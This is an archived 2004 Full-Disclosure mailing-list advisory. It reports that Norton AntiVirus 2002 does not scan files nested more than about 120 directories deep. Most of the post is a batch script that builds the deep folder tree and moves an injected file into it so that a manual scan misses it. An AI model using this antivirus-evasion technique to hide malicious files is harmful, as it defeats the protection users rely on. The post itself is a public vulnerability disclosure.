[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....
From: bipin gautam <visitbipin@xxxxxxxxx>
Date: Sat, 17 Apr 2004 07:47:02 -0700 (PDT)

Norton AntiVirus nested file manual scan bypass.....

Product Version: Norton Antivirus 2002 (~Only tested
On...~)
Risk Impact: Medium

Summary:

If you manage to inject a file in the
sub-directory(s); beyond windows OS can create
normally, [ say in 130 'th + sub-directory at
c:\..\..\..\....upto 130'th ... ] NAV fails to scan
the NESTED FILE. Indeed, it's more a windows
restriction in accesing the nested file than a
ANTIVIRUS flaw. Other antivirus product should also
suffer the same. *.PLEASE VERIFY.* NAV

=-------CUT----------=
@echo off
rem Bipin Gautam [hUNT3R]
rem [http://www.geocities.com/visitbipin] *
[http://www.01security.com]
echo »
echo ************************************************
echo -( For  a  harmless   test...  you   can    use,
echo http://www.eicar.org/anti_virus_test_file.htm )-
echo ************************************************
pause
cd\
c:
cd\
:hUNT3r 
md 1 
cd 1 
if not errorlevel  1 goto :hUNT3r
cd..
rmdir 1
md X
cls
echo
***************************************************************
echo  Now you can inject any file inside the folder
'X' which is inside 
echo 120'th sub-directory of 'c:\1' [ i.e
c:\1\..\...\.....[120'th dir].....\X\ ] 
echo Note: The file you are moving to'c:\1\...\X\'
should only contain 
echo '1' char. file name, say: '1.exe' or '2.exe' or
'a.exe' etc... 
echo not as '123.not' 'qwert.hak'
echo .........
echo               So, ARE YOU DONE!?
echo ......... 
echo   After  this  batch   script  is  terminated, 
you'll
echo   find the file you ^just copied^ inside
c:\1\........\X\ 
echo   now in c:\3\3\3\3\3\1\1\1\......[130' th
dir].....\X\
echo   mmm... Then have a  manual scan of c:\3\ Any
file you
echo   have put inside the dir. 'X' can't be detected
by NORTON Antivirus anymore!!!
echo
***************************************************

pause
cd\
md 3\3\3\3\3\3\3\3\3\3\
cd\
xcopy /E /I c:\1\*.* c:3\3\3\3\3\3\3\3\3\3\
exit

=-------CUT----------=

Disclaimer: The information in the advisory is
believed to be accurate at the time of printing based
on currently available information. Use of the
information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this
information. Neither the author nor the publisher
accepts any liability for any direct, indirect or
consequential loss or damage arising from use of, or
reliance on this information.


        
                
__________________________________
Do you Yahoo!?
Yahoo! Tax Center - File online by April 15th
http://taxes.yahoo.com/filing.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....[silent patch???]
  - From: bipin gautam
- Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....
  - From: natch

Prev by Date: [Full-Disclosure] Internet Explorer XSS published unpatched in SP1 AND SP2
Next by Date: [Full-Disclosure] [SECURITY] [DSA 489-1] New Linux 2.4.17 packages fix local root exploit (mips+mipsel)
Previous by thread: [Full-Disclosure] Internet Explorer XSS published unpatched in SP1 AND SP2
Next by thread: Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....[silent patch???]
Index(es):
- Date
- Thread